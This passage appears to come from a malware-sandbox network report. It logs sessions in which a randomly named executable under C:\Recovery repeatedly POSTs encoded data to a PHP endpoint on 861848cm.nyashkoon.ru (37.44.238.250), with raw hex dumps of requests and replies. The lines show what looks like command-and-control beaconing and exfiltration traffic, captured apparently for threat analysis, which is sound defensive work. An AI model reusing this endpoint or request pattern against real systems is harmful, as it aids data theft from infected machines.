                                                                    Nov 6, 2024 03:38:54.288197041 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    105 | 192.168.2.4 | 50112 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:54.558754921 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:54.907113075 CET | 1012 | OUT | request body
                                                                    Nov 6, 2024 03:38:55.361315966 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:55.440946102 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    106 | 192.168.2.4 | 50114 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:55.702903986 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:56.047849894 CET | 1012 | OUT | request body


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    107 | 192.168.2.4 | 50115 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:56.448141098 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:56.797730923 CET | 1276 | OUT | request body
                                                                    Nov 6, 2024 03:38:57.290230036 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:57.362183094 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    108 | 192.168.2.4 | 50116 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:56.565592051 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:56.922693968 CET | 1012 | OUT | request body
                                                                    Nov 6, 2024 03:38:57.383259058 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:57.655921936 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP
                                                                    Nov 6, 2024 03:38:57.656372070 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    109 | 192.168.2.4 | 50117 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:57.784317970 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:58.141700029 CET | 1012 | OUT | Data Raw: 56 50 5a 5c 56 5e 50 53 5a 5f 52 51 54 5e 5b 59 55 51 59 58 51 50 52 5d 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VPZ\V^PSZ_RQT^[YUQYXQPR]QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%];<2=+#>#*5X>-._'((Y ?+9 '&'X$.Q-6
                                                                    Nov 6, 2024 03:38:58.603506088 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:58.678256035 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    110 | 192.168.2.4 | 50118 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:58.813951015 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:59.172717094 CET | 1012 | OUT | Data Raw: 56 51 5f 5c 56 56 50 59 5a 5f 52 51 54 58 5b 5b 55 50 59 5c 51 56 52 59 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VQ_\VVPYZ_RQTX[[UPY\QVRYQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%X/U<+7(0?(92?=:]3$[#<2U(>795 X47._&9'X$.Q-.
                                                                    Nov 6, 2024 03:38:59.630435944 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:59.701581955 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    111 | 192.168.2.4 | 50119 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:00.449150085 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:00.807782888 CET | 1012 | OUT | Data Raw: 56 56 5f 5c 56 5b 55 5f 5a 5f 52 51 54 5d 5b 5c 55 53 59 5a 51 51 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VV_\V[U_Z_RQT][\USYZQQRXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%/5=8;>#?>9=?.5''4=(-3:%?!7>19'X$.Q-
                                                                    Nov 6, 2024 03:39:01.399779081 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:01.399998903 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP
                                                                    Nov 6, 2024 03:39:01.400011063 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    112 | 192.168.2.4 | 50120 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:01.565989017 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:01.922717094 CET | 1012 | OUT | Data Raw: 53 56 5a 55 53 5c 55 59 5a 5f 52 51 54 5d 5b 5a 55 50 59 5a 51 56 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SVZUS\UYZ_RQT][ZUPYZQVRSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%Y,/6R(;4^?3 Y>\)[=*Z'4?*W<>Y96, 7&29'X$.Q-
                                                                    Nov 6, 2024 03:39:02.377213001 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    113 | 192.168.2.4 | 50121 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:02.382942915 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:02.735289097 CET | 1276 | OUT | Data Raw: 53 51 5a 5f 53 58 50 5a 5a 5f 52 51 54 5f 5b 52 55 54 59 5c 51 52 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SQZ_SXPZZ_RQT_[RUTY\QRRSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%^;.+<_+0(9"*>5$/#Y2Q+-/-%##$"&9'X$.Q-2
                                                                    Nov 6, 2024 03:39:03.224968910 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:03.300338030 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 59 2b 14 00 5e 27 3b 09 0c 29 10 25 58 28 1e 0e 07 3b 0b 27 06 29 23 2f 01 2b 28 28 50 34 11 0a 07 35 32 29 11 37 1c 20 07 2b 3b 21 5f 05 1d 39 1c 33 07 2b 0d 2a 0b 2d 00 29 27 2c 43 25 23 3f 19 29 2b 36 1e 34 3a 2a 1c 31 2d 3e 05 32 31 2b 55 2a 34 39 15 2e 3f 3b 51 32 3a 2a 57 09 16 20 50 27 1d 38 03 29 08 3b 5e 27 00 21 13 26 5c 23 11 29 12 33 5b 23 0a 04 15 2a 0d 2c 07 23 37 2a 5c 24 2a 2d 1a 31 3d 2b 19 28 08 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: Y+^';)%X(;')#/+((P452)7 +;!_93+*-)',C%#?)+64:*1->21+U*49.?;Q2:*W P'8);^'!&\#)3[#*,#7*\$*-1=+(&U" T0]O


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    114 | 192.168.2.4 | 50122 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:02.708014965 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:03.063471079 CET | 1012 | OUT | Data Raw: 56 53 5f 5e 56 5d 50 5f 5a 5f 52 51 54 59 5b 5a 55 56 59 59 51 5f 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VS_^V]P_Z_RQTY[ZUVYYQ_RSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%,R(+(_+0#*-_>&$X#,&<>+:$Y ')'X$.Q-*
                                                                    Nov 6, 2024 03:39:03.518095016 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:03.585042000 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    115 | 192.168.2.4 | 50123 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:03.705976009 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:39:04.063492060 CET | 1012 | OUT | Data Raw: 56 51 5a 5c 56 59 50 53 5a 5f 52 51 54 5f 5b 58 55 54 59 5d 51 52 52 52 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VQZ\VYPSZ_RQT_[XUTY]QRRRQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%;5?(?+)&?=.3#4)+=7Z-C/#>%9'X$.Q-2
                                                                    Nov 6, 2024 03:39:04.524857998 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:04.614190102 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    116 | 192.168.2.4 | 50124 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:04.736673117 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:05.094713926 CET | 1012 | OUT | Data Raw: 56 52 5f 58 56 5b 55 5e 5a 5f 52 51 54 5c 5b 5f 55 51 59 5c 51 56 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VR_XV[U^Z_RQT\[_UQY\QVR\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&-?1<8]<#>-_)6\'X4Y&W?>/-&0Y7&)'X$.Q->
                                                                    Nov 6, 2024 03:39:05.554753065 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:05.630374908 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    117 | 192.168.2.4 | 50125 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:05.753454924 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:06.110245943 CET | 1012 | OUT | Data Raw: 53 55 5f 5c 56 58 50 5d 5a 5f 52 51 54 5b 5b 5b 55 5c 59 5f 51 56 52 5a 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SU_\VXP]Z_RQT[[[U\Y_QVRZQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%8"<<X(3$[)\1_?-"$ [ ?.(.%3!'^%)'X$.Q-"
                                                                    Nov 6, 2024 03:39:06.572362900 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:06.645905018 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    118 | 192.168.2.4 | 50126 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:06.767365932 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:07.125850916 CET | 1012 | OUT | Data Raw: 53 55 5a 5f 53 5c 55 5e 5a 5f 52 51 54 5f 5b 5c 55 57 59 59 51 51 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SUZ_S\U^Z_RQT_[\UWYYQQR\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%,,2<^?$>-==\$; &?X#].%X &_&)'X$.Q-2
                                                                    Nov 6, 2024 03:39:07.585681915 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:07.664144993 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    119 | 192.168.2.4 | 50127 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:07.781730890 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:08.125845909 CET | 1012 | OUT | Data Raw: 53 56 5f 5f 53 5a 50 5f 5a 5f 52 51 54 5c 5b 5c 55 5d 59 56 51 52 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SV__SZP_Z_RQT\[\U]YVQRR^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%Y8?=8 <04>1^*>*$8#,"<./\.%0X '!&9'X$.Q->


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    120 | 192.168.2.4 | 50128 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:08.323539972 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
